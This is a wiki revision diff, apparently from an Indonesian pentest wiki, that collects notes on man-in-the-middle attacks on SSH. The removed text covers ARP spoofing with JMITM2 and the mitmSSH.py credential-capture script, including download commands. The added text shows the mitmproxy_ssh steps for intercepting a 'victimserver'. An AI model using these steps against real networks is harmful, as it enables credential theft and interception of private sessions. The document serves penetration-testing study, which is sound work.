|
|
| (2 intermediate revisions by the same user not shown) |
| Line 1: |
Line 1: |
| sumber: https://milo2012.wordpress.com/2014/11/12/automating-man-in-the-middle-sshv2-attacks/ | | sumber: https://andrewmichaelsmith.com/2014/03/quick-and-easy-ssh-mitm/ |
|
| |
|
| | # Download mitmproxy |
| | git clone https://github.com/mitmproxy/mitmproxy.git |
|
| |
|
| | #Generate mitm keys (these go to ~/.mitmkeys) |
| | ./mitmkeys |
|
| |
|
|
| |
|
| | Now you want to install the SSH key you just generated to the server you want to mitm. |
|
| |
|
| | #Install SSH key |
| | ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver |
|
| |
|
| Recently during an internal penetration test, I was performing ARP spoofing and i discovered a SSH connection from the administrator computer to another box.
| | Then run the proxy, pointing it at the victimserver. |
|
| |
|
| That sounds like the correct way to access remote hosts securely. However, the problem was that the company was using a network switch that was vulnerable to ARP spoofing.
| | #Run proxy |
| | ./mitmproxy_ssh -H victimserver |
|
| |
|
| I came across the below article about performing ARP spoofing and MITM SSH connections to steal credentials.
| | This runs the proxy on localhost:2222 |
|
| |
|
| When performing arp spoofing and performing a mitm attack on SSH, the victim does get an alert message saying that there is a key mismatch but most people just ignore them anyway.
| | Now simply connect to the local proxy: |
|
| |
|
| Below is the link to the original article.
| | ssh localhost -p 2222 |
| http://woff.hu/tools/ssh2-mitm-like-attack-with-jmitm2/
| |
|
| |
|
| In the article, the author demonstrates the use of a software called JMITM2 (http://www.david-guembel.de/index.php?id=6) which is sort of like a honey pot that proxies SSH connections between the victim and the target SSH server.
| | And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh. |
|
| |
|
| However, there are a number of steps to be done manually to execute this attack during an internal penetration test.
| |
|
| |
|
| # Check if network is vulnerable to ARP spoofing
| |
| # Check if there are any active SSH connections in the network
| |
| # Identify the victim computer and SSH server
| |
| # Modify the configuration files of JMITM2
| |
| # Modifying iptables
| |
| # ARP spoofing
| |
| # Checking JMITM2 console for credentials
| |
| # Re-arp the router and victim host with the correct MAC addresses of each.
| |
|
| |
|
| It would save a great amount of time to automate these steps. I wrote a script that does just that.
| |
|
| |
| Running the command below checks the network for active SSH connections (via ARP spoofing) and then automates the whole attack to outputs any credentials captured to the console.
| |
|
| |
| python2.7 mitmSSH.py -analyze
| |
|
| |
| If you know the victim host IP and SSH server, you can use the below command
| |
|
| |
| python2.7 mitmSSH.py -host victims -ssh sshServerIP
| |
|
| |
| IMG_2025.PNG
| |
| This script has only been tested on Kali Linux.
| |
|
| |
| There are a couple of things that are still in the works to improve the script.
| |
| 1. Switching from intercepter-ng for ARP spoofing to scapy.
| |
|
| |
| The script can be grabbed from the below link
| |
| https://github.com/milo2012/pentest_automation/blob/master/mitmSSH.py
| |
|
| |
|
| |
| ==Download==
| |
|
| |
| wget https://raw.githubusercontent.com/milo2012/pentest_automation/master/mitmSSH.py
| |
|
| |
| mkdir /tmp/tools
| |
| cd /tmp/tools
| |
| wget https://github.com/intercepter-ng/mirror/archive/master.zip
| |
| unzip master.zip
| |
| mv /tmp/tools/mirror-master/* /tmp/tools/
| |
| unzip Intercepter-NG.CE.05.zip
| |
|
| |
| ==Edit source==
| |
|
| |
| * line 1: rom > from
| |
| * line currentPath="/tmp1/tools" > currentPath="/tmp/tools"
| |
|
| |
| Lakukan
| |
|
| |
| mkdir /tmp/tools
| |
|
| |
|
| ==Referensi== | | ==Referensi== |
|
| |
|
| | * https://andrewmichaelsmith.com/2014/03/quick-and-easy-ssh-mitm/ |
| * https://milo2012.wordpress.com/2014/11/12/automating-man-in-the-middle-sshv2-attacks/ | | * https://milo2012.wordpress.com/2014/11/12/automating-man-in-the-middle-sshv2-attacks/ |
| * https://github.com/milo2012/pentest_automation/blob/master/mitmSSH.py | | * https://github.com/milo2012/pentest_automation/blob/master/mitmSSH.py |
| * http://woff.hu/tools/ssh2-mitm-like-attack-with-jmitm2/ | | * http://woff.hu/tools/ssh2-mitm-like-attack-with-jmitm2/ |
sumber: https://andrewmichaelsmith.com/2014/03/quick-and-easy-ssh-mitm/
# Download mitmproxy
git clone https://github.com/mitmproxy/mitmproxy.git
#Generate mitm keys (these go to ~/.mitmkeys)
./mitmkeys
Now you want to install the SSH key you just generated to the server you want to mitm.
#Install SSH key
ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver
Then run the proxy, pointing it at the victimserver.
#Run proxy
./mitmproxy_ssh -H victimserver
This runs the proxy on localhost:2222
Now simply connect to the local proxy:
ssh localhost -p 2222
And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.
Referensi
